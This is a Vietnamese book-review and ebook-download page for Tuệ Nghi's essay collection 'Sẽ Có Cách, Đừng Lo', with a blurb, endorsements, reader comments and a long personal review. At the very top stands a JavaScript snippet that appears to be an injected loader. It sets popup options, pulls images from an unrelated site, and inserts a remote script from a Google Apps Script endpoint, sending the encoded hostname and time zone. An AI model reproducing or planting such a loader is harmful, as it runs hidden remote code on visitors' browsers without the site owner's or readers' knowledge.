var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Lưu ngay sẽ có cách đừng lo ebook [Đầy Đủ Nhất 2023]

Giới thiệu sách Sẽ Có Cách, Đừng Lo – Tác giả Tuệ Nghi

Sẽ Có Cách, Đừng Lo

Tản văn Sẽ có cách, đừng lo với lối viết gần gũi, những tự sự, trăn trở về tình yêu, chuyện đời – chuyện người. Cuốn sách như một người bạn động viên tác giả cũng như đem lại niềm tha thiết yêu cuộc sống cho độc giả, thể hiện năng lượng sống tích cực khi đứng trước những điều tưởng chừng như rất khó vượt qua.

“Nếu cánh cửa này đóng lại, bạn sẽ chọn mở tiếp cánh cửa khác hay bất lực trong oán trách vô vọng?

Người có thể dối ta, nhưng ta tuyệt đối không bao giờ tự dối chính mình. Không có điều gì là mãi mãi, kể cả những nỗi buồn cũng thế!

Cuộc sống là muôn vạn những chữ “Ngờ”, chúng ta không học được chữ “Ngờ”, càng không thể đoán biết trước được nó sẽ đến lúc nào. Nhưng chúng ta hoàn toàn có thể học cách đón nhận nó, một cách tích cực và thanh thản nhất có thể…

Có người sẽ vì những đắng cay ngang trái ở đời mà gục ngã, mất hết niềm tin sống lẫn nhuệ khí sinh tồn. Nhưng cũng có người càng bất hạnh, càng nghịch cảnh thì động lực vươn lên trong họ lại càng lớn. Họ nén hết cay đắng xuống, tạo thành một lực đẩy để bật ra khỏi vũng lầy dưới chân mình.

Mọi thứ đều sẽ có cách giải quyết, nút thắt nào cũng sẽ có cách để mở, người cần đến sẽ đến và người cần đi sẽ buộc phải ra đi. Sẽ có cách, đừng lo!”

Nhận xét về Tuệ Nghi

“Cô nàng tổng giám đốc 9x xinh đẹp khiến nhiều bạn trẻ khâm phục bởi sự nghị lực, không đầu hàng nghịch cảnh, thể hiện năng lực qua việc kinh doanh, viết sách… Tờ New York Times của Mỹ từng nhắc đến Tuệ Nghi là một cô gái có tuổi thơ khốn khó nhưng nhờ sự bền bỉ, không đầu hàng số phận để đi đến thành công. Vừa qua, Tuệ Nghi xuất hiện trên sóng truyền hình quốc gia nước cộng hoà Slovenia trong một đoạn phỏng vấn về vai trò của người phụ nữ Việt Nam trong giai đoạn đổi mới. Phong thái chững chạc của một nữ doanh nhân trẻ khiến nhiều bạn trẻ vừa thán phục vừa mơ ước.”

(Theo Vnexpress)

“Sau những sóng gió, Tuệ Nghi thu mình lại, đem hết những chất chứa về chuyện mình, chuyện đời… vào những trang sách. Ra mắt tác phẩm “Sẽ có cách, đừng lo” không phải để Nghi chứng tỏ “tôi vẫn ổn!”, mà hơn hết nó là một người bạn đã cùng Nghi đi qua những tháng ngày tưởng chừng như khó khăn nhất. Tác phẩm như một sự động viên cho Nghi, cho những ai đang gặp phải những chuyện không vui, những lo toan thường nhật, những đớn đau rất con người…”

(Hoàng Trang- Biên Tập Viên NXB Văn Học)

“Gặp Tuệ Nghi lần đầu trong một buổi trà chiều Sài Gòn, trước mắt tôi là một cô gái mong manh nhưng ánh mắt đầy “nội lực”… Không còn “gồng” mình với những con số kinh doanh, những kế hoạch chiến lược…, chỉ còn lại những câu chuyện dung dị rất đời, rất phụ nữ, rất bình thường… Bất giác, cô ấy khóc! Tôi biết cô ấy không dễ khóc. Và đột nhiên tôi nghĩ, người phụ nữ này xứng đáng được yêu thương! Tác phẩm “Sẽ có cách, đừng lo” ra đời cũng từ những giọt nước mắt ấy, như một món quà của niềm ủi an, niềm hân hoan cuộc sống… trân thương dành tặng các quý độc giả.”

(Thảo Minh Châu- Giám đốc Minh Châu Books)

1. Thông tin chi tiết

 • Tên sách: Sẽ Có Cách, Đừng Lo
 • Tác giả: Tuệ Nghi
 • Kích thước: 13 x 20.5 cm
 • Loại bìa: Bìa mềm
 • Số trang: 192
 • SKU 2511450508131

2. Đánh giá Sách Sẽ Có Cách, Đừng Lo

1. Mình đã đọc qua quyển này và đã quyết định mua lại vì thấy rất hay. Nội dung sách bao gồm nhiều câu chuyện nhỏ nhưng lại thể hiện được nội dung lớn của cuốn sách. Ngoài ra, mình cũng rất thích cách viết của tác giả Tuệ Nghi-rất nhẹ nhàng, chậm rãi và rất dễ đi vào lòng người.

2. Cuốn sách với nhiều mẩu chuyện chứa đựng những tâm trạng, những góc nhìn của một con người giàu bản lĩnh và cá tính. Tuy nhiên, những biến cố, thăng trầm của cuộc sóng đã để lại dấu ấn trong tác phẩm , khiến ta đọc xong dù rất cảm phục ý chí của các nhân vật nhưng vẫn chút ngậm ngùi cho con người tài hoa phải trải qua những sóng gió cuộc đời…

3. Sách rất hay ý nghĩa, gần với cuộc sống, sẽ giúp cho người đọc học hỏi nhìu điều làm ta phải suy nghĩ,chất lượng sách quá tuyệt giấy thì đọc ko mỏi hay chá mắt, giấy quá tuyệt vời thực sự rất tốt

4. Quyển sách mình đọc lúc đang gặp vẫn đề của chuyện tình cảm, không chỉ riêng tình cảm mà nó cũng cho mình một cái nhìn khác của cuộc sống xung quanh và nó đã giúp mình hiểu ý nghĩa của hiện tại, và những thứ đã qua của quá khứ, mình cảm thấy biết ơn quyển sách này rất nhiều

5. Đây là quyển sách thứ 2 mình mua của tác giả Tuệ Nghi sau khi vô tình tìm đọc được quyển “Đàn ông hay hứa, phụ nữ hay tin”. Thực sự rất nể phục cô gái này vì tuổi còn trẻ mà tài sắc lại hơn người. Đọc sách của người cùng tuổi làm cho mình có cảm giác như đang nghe những dòng tâm sự, chia sẻ của Tuệ Nghi sau những thăng trầm, biến cố, thử thách mà cuộc đời đã đặt ra cho cô ấy. Và cũng nhờ đó mà tạo ra những thành công, tạo ra 1 Tuệ Nghi bản lĩnh như ngày hôm nay.

Với cách viết nhẹ nhàng, tự sự, mỗi câu chuyện mình đọc đều có cảm giác như tác giả là người trong cuộc chứ không phải là chỉ là nghe người khác kể lại rồi viết ra. Và thực sự đến gần cuối sách cũng là lúc tác giả kể những câu chuyện thực xảy ra trong cuộc đời mình, với những đổ vỡ trong chuyện hôn nhân của chính cô. Đúng là ông trời không cho ai tất cả bao giờ, được này mất kia, dường như đó đã là quy luật của tự nhiên. Thôi thì, sau tất cả, người phụ nữ nào cũng xứng đáng được yêu thương và hạnh phúc, chỉ là sớm hay muộn thôi.

6 Một cuốn sách rất hay. Cho mình cảm nhận dc rất nhiều điều trong cuộc sống.Thông điệp của cuốn sách mang lại là: Cuộc sống có rất nhiều chông gai, nhưng cho dù mọi thứ đau khổ, khó khăn đến mấy thì cũng sẽ có cách giải quyết. Chỉ cần chúng ta học cách đón nhận vấn đề một cách tích cực, nút thắt nào cũng sẽ có cách để mở. Hãy tin rằng, rồi “Sẽ có cách, đừng lo!”. Ngay phần đầu sẽ có cách đã rất hay. Cách mà tác giả Tuệ Nghi dẫn dắt rất chân thật sinh động và chan chứa rất nhiều cảm xúc ở phần 2 thì cho mình cảm giác xúc động. có rất nhiều hoàn cảnh đáng thương trên thế gian này. Và mình rất may mắn. Tuệ Nghi đã cho tôi biết cay tha thứ ……. rất ngưỡng mộ tác giả Tuệ Nghi. Một cô giái nhạy cảm. Tràn ngập đam mê và nhiệt huyết của tuổi trẻ

7 Cuốn sách ” sẽ có cách đừng lo ” chủ yếu nói về những câu chuyện tình yêu, công việc, cuộc sống và những lời tâm sự của tác giả. “Nếu cánh cửa này đóng lại, bạn sẽ chọn mở tiếp cánh cửa khác hay bất lực ? Người có thể dối ta, nhưng ta tuyệt đối không bao giờ tự dối chính mình. Cuộc sống là muôn vạn những chữ “Ngờ”, chúng ta không học được chữ “Ngờ”, càng không thể đoán biết trước được nó sẽ đến lúc nào. Nhưng chúng ta hoàn toàn có thể học cách đón nhận nó, một cách tích cực và thanh thản nhất có thể…” Chúng ta hãy thử thay vì gục ngã khi thất bại thì hãy đứng lên mạnh mẽ tìm ra các cách giải quyết. Dù chỉ là còn một chút hi vọng nhỏ nhoi cũng còn hơn là không làm gì để sau này nghĩ lại rồi thốt ra ” giá như ” thì đã quá muộn rồi.

Review sách Sẽ Có Cách, Đừng Lo

Màu xanh nhẹ nhàng, màu xanh yên bình thế nên trước khi khóa cửa phòng trọ để về quê, tôi đã cầm cuốn sách “Sẽ có cách đừng lo – Tuệ Nghi” có trên giá sách rồi bỏ vào cặp.

“Nếu cánh cửa này đóng lại, bạn sẽ chọn mở tiếp cánh cửa khác hay bất lực trong oán trách vô vọng? Người có thể dối ta, nhưng ta tuyệt đối không bao giờ tự dối chính mình. Không có điều gì là mãi mãi, kể cả những nỗi buồn cũng thế!”

Câu chữ lắc lư theo nhịp điệu xe buýt còn tôi cuốn mình vào những câu chuyện đời, chuyện người, chuyện tình yêu có trong tản văn “ Sẽ có cách đừng lo.”

Tôi nghẹn, tôi cay, khi mỗi lần tôi nhớ hình ảnh cô gái “nhân vật tôi” ăn thức ăn trong thùng rác hay đoạn cô phải chứng kiến cảnh những chú chó của mình bị bán đi, đặc biệt mỗi lần nhắc đến người bố, rõ ràng cô rất yêu bố nhưng lại không thể nói ra, giả vờ hận bố trong “Luật ngầm”. Còn bây giờ, tôi đến với “ Sẽ có cách đừng lo”, nó lại mang đến cho tôi cảm xúc khác, hình ảnh khác, dư vị khác.

Đó là “Hoa nở để tàn … người gặp để tan”, trong tình yêu lúc cần buông thì buông “Người cần đến sẽ đến và người cần đi sẽ buộc phải ra đi.”

Là lời dạy của bố : “Lúc nào con biết quý trọng ” tiền lẻ” và những thứ tưởng chừng nhỏ nhất thì con mới có thể giữ gìn được ” tiền chẵn” và những điều lớn lao.”

Là tuổi thơ, là niềm yêu thương. Trong cuộc sống điều may mắn, hạnh phúc nhất chính là được cả bố lẫn mẹ chăm sóc và bảo vệ : “Tôi đã ước , giá tôi được trở lại tuổi thơ, khi mà những mơ ước của tôi chỉ dừng lại ở tấm áo mới, cuốn truyện tranh. Tuổi thơ là khi tôi dễ dàng tìm được cảm giác thỏa mãn và hạnh phúc nhất, chỉ cần được nghỉ học một buổi là đã cảm thấy mình ngập tràn trong hưng phấn của năng lượng hạnh phúc mạng lại.Nhưng giờ đây tôi rất khó tìm về cảm giác đó.Hạnh phúc nhất là khi được làm trẻ con, dù rằng trẻ con thì cứ mong được làm người lớn”.

Là khát khao, ước mơ, là niềm tin, động lực, ý nghĩa của cuộc sống : “Cuộc sống là muôn vạn những chữ “Ngờ”, chúng ta không học được chữ “Ngờ”, càng không thể đoán biết trước được nó sẽ đến lúc nào. Nhưng chúng ta hoàn toàn có thể học cách đón nhận nó, một cách tích cực và thanh thản nhất có thể…

Có người sẽ vì những đắng cay ngang trái ở đời mà gục ngã, mất hết niềm tin sống lẫn nhuệ khí sinh tồn. Nhưng cũng có người càng bất hạnh, càng nghịch cảnh thì động lực vươn lên trong họ lại càng lớn. Họ nén hết cay đắng xuống, tạo thành một lực đẩy để bật ra khỏi vũng lầy dưới chân mình.

Mọi thứ đều sẽ có cách giải quyết, nút thắt nào cũng sẽ có cách để mở, người cần đến sẽ đến và người cần đi sẽ buộc phải ra đi. Sẽ có cách, đừng lo!”

Và cả những lời khuyên của chị nữa:

“Phụ nữ cần gì?

Khí chất: Xấu cũng được, đẹp thì tốt. Nhưng thứ quan trọng của một người phụ nữ không phải là xấu hay đẹp mà là khí chất. Đừng nghĩ khí chất là khi cố bôi trát hàng hiệu từ đầu đến chân. Khí chất của một người phụ nữ nằm ở cách đối nhân xử thế, cách sống với đời, với người.

Cá tính: Không phải chuyện gì cũng nhảy vào nâng quan điểm, phán xét với từ ngữ ngoa ngắt thì gọi là cá tính. Cá tính thật sự nó nằm ngấm ngầm rất khó nhận ra. Người phụ nữ có cá tính riêng thường ít nói lời ngoa ngắt với thiên hạ,họ lắng nghe nhiều hơn và chỉ nói vừa đủ. Sân si và cá tính là hai phạm trù hoàn toàn khác nhau mà nhiều người hay bị nhầm lẫn.

Độc lập: Tự mình kiếm thật nhiều tiền, bằng cách chính đáng. Thời buổi kinh tế khó khăn, tràn vi tróc vẩy kiếm được đồng tiền để nuôi sống bản thân không dễ dàng gì. Nhưng phải cố gắng lên! Kiếm nhiều thì tiêu nhiều, kiếm ít thì tiêu ít. Miễn không phải ngửa tay xin xỏ bất kỳ người đàn ông nào là được. Thích gì thì kiếm tiền mà mua, đừng tiểu xảo bòn mót từ đàn ông rồi yêu cầu đàn ông phải tôn trọng mình, không có đâu. Độc lập là thứ mà đàn bà luôn phải ghi nhớ và thực hiện để có thể ngẩng cao đầu mà bước.

Đàn ông: Đừng chăm chăm tìm kiếm người đàn ông mà thiên hạ hay gọi là soái ca. Con nhà giàu, học giỏi lại đẹp trai cũng không quan trọng thằng đàn ông đó có yêu mình thật hay không, có sẵn sàng dang tay bảo vệ mình dù trời đất có sập xuống hay không. Đừng yêu một người đàn ông chỉ biết chổng mông gào lên ba tiếng:” Anh yêu em”. Đừng bao giờ nghe đàn ông nói , mà hãy nhìn cho rõ những gì họ làm.Sẽ có cách đừng lo

Yêu bản thân mình: Đừng phó thác đời mình cho đàn ông nào cả. Đừng bắt ai phải chịu trách nhiệm cho cuộc đời mình. Đừng đòi hỏi ai phải yêu mình hết lòng khi chính mình còn chưa biết tự yêu bản thân.

Nhà văn nổi tiếng người Anh sống ở thế kỷ thứ 18 Dr. Samuel Johnson đã từng nói một câu rất chua cay: ” Thưa ngài,một phụ nữ đi thuyết giảng thì cũng tựa như một con chó đi bằng hai chân sau. Nó đi không giỏi lắm nhưng ngài sẽ ngạc nhiên bởi nó đi được bằng hai chân sau”

Phụ nữ nếu muốn được tôn trọng thì bản thân phải nỗ lực rất nhiều, tự tin và tôn trọng chính mình…”

“Sẽ có cách đừng lo”, cảm ơn chị Tuệ Nghi rất nhiều, một cuốn sách hay, nhiều triết lý sâu sắc, những câu chuyện chân thực, những dòng tâm sự cảm động, chân thành.

Mua sách Sẽ Có Cách, Đừng Lo ở đâu?

Giá trên thị trường cuốn “Sẽ Có Cách, Đừng Lo” khoảng 42.000đ đến 68.000đ. Tuy nhiên bạn có thể tham khảo sách trên các trang thương mại điện tử như: Tiki, Fahasa, Shopee,…

Đọc sách Sẽ Có Cách, Đừng Lo ebook pdf

Để download “sách Sẽ Có Cách, Đừng Lo pdf” bạn cần có tài khoản tại Siêu thị sách 86 hoặc đồng thời (Like Page Sach86 và comment Email) phía dưới để nhận link tải sách.

(Trong nhiều trường hợp vướng mắc về bản quyền hoặc mới xuất bản nên một số link sách sẽ không được cung cấp. Hoặc số lượng fan xin sách quá nhiều Sach86 không thể gửi kịp trong thời gian 15 ngày nên rất mong mọi người thông cảm).

THÔNG BÁO QUAN TRỌNG: Từ ngày 10/06/2023 Sách 86 tạm thời ngừng cung cấp các bản [Ebook, Pdf] với lý do vướng mắc về bản quyền. Tính năng tải sách sẽ được mở lại khi có thông báo mới. MỘT SỐ SÁCH VẪN ĐƯỢC TẢI

Xem thêm

 • Những Trải Nghiệm Cuộc Sống
 • Nghệ Thuật Sáng Tạo Cuộc Sống
 • Những Câu Chuyện Cuộc Sống
 • Một Đời Đáng Giá Đừng Sống Qua Loa
 • Quẳng Gánh Lo Đi Và Vui Sống

[Review sách, Tải sách, Ebook, Pdf]